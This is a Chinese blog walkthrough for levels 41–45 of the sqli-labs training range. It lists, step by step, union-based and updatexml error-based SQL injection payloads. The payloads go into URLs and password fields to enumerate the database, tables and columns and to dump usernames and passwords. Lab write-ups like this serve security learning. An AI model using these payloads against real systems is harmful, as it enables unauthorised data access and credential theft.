sqli-labs靶场通关攻略 41-45

云舒zovn2024-08-29 13:54

主页有sqli-labs靶场通关攻略 1-40

第四一关 less-41

步骤一:查询闭合方式

?id=1 --+

步骤二:查询数据库

?id=-1 union select 1,2,database()--+

步骤三:查看表名

?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+

步骤四:查看users表列名

?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

步骤五:查看users表信息

?id=-1 union select 1,2,group_concat(id,username,password) from users --+

第四二关 less-42

步骤一:登录页面

步骤二:查询数据库

密码框输入:'and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- aaa

步骤三:查看表名

密码框输入:'and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() ),0x7e),1) -- aaa

步骤四:查看users表列名

密码框输入:'and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_sche ma.columns where table_name='users' ),0x7e),1) -- aaa

第四三关 less-43

步骤一:登录页面

步骤二:查询数据库

密码框输入:') and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- aaa

步骤三:查看表名

密码框输入:') and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() ),0x7e),1) -- aaa

步骤四:查看users表列名

密码框输入:') and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' ),0x7e),1) -- aaa

第四四关 less-44

步骤一:登录页面

步骤二:查询数据库

密码框输入:1' union select 1,database(),3 #

步骤三:查看表名

密码框输入:1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #

步骤四:查看users表列名

密码框输入:1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' #

步骤五:查看表中信息

1' union select 1,group_concat(username,password),3 from users #

第四五关 less-45

步骤一:登录页面

步骤二:查询数据库

密码框输入:1') union select 1,database(),3 #

步骤三:查看表名

密码框输入:1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #

步骤四:查看users表列名

密码框输入:1') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' #

相关推荐
万邦科技Lafite1 小时前
利用淘宝商品详情接口获取商品价格,监控商品价格浮动
数据库·api·开放api接口·淘宝开放接口
深藏功yu名2 小时前
Day24:向量数据库 Chroma_FAISS 入门
数据库·人工智能·python·ai·agent·faiss·chroma
知识分享小能手2 小时前
MongoDB入门学习教程,从入门到精通,MongoDB创建、更新和删除文档(3)
数据库·学习·mongodb
chehaoman2 小时前
MySQL的索引
android·数据库·mysql
cm6543202 小时前
用Python破解简单的替换密码
jvm·数据库·python
还是做不到嘛\.3 小时前
DVWA靶场-Brute Force
运维·服务器·数据库·学习
老张聊数据集成3 小时前
ETL是什么?一文讲清ETL和ELT的区别
数据库
Oueii3 小时前
掌握Python魔法方法(Magic Methods)
jvm·数据库·python
Elastic 中国社区官方博客4 小时前
现已正式发布: Elastic Cloud Hosted 上的托管 OTLP Endpoint
大数据·运维·数据库·功能测试·elasticsearch·全文检索
热门推荐
012026年3月AI领域大事件:DeepSeek引领开源风暴02GitHub 镜像站点03Qwen3.5 开源全解析:从 0.8B 到 397B,代际升级 + 全场景选型指南04围棋-html版本05班级宠物园部署指南06小黑课堂计算机二级WPSoffice题库软件下载安装教程(2026年3月最新版)07UV安装并设置国内源08OpenClaw 使用和管理 MCP 完全指南09【计算机一级WPSoffice】小黑课堂题库软件下载安装教程(2026年3月最新版)10“wsl --install -d Ubuntu-22.04”下载慢,中国地区离线安装 Ubuntu 22.04 WSL方法(亲测2025年5月6日)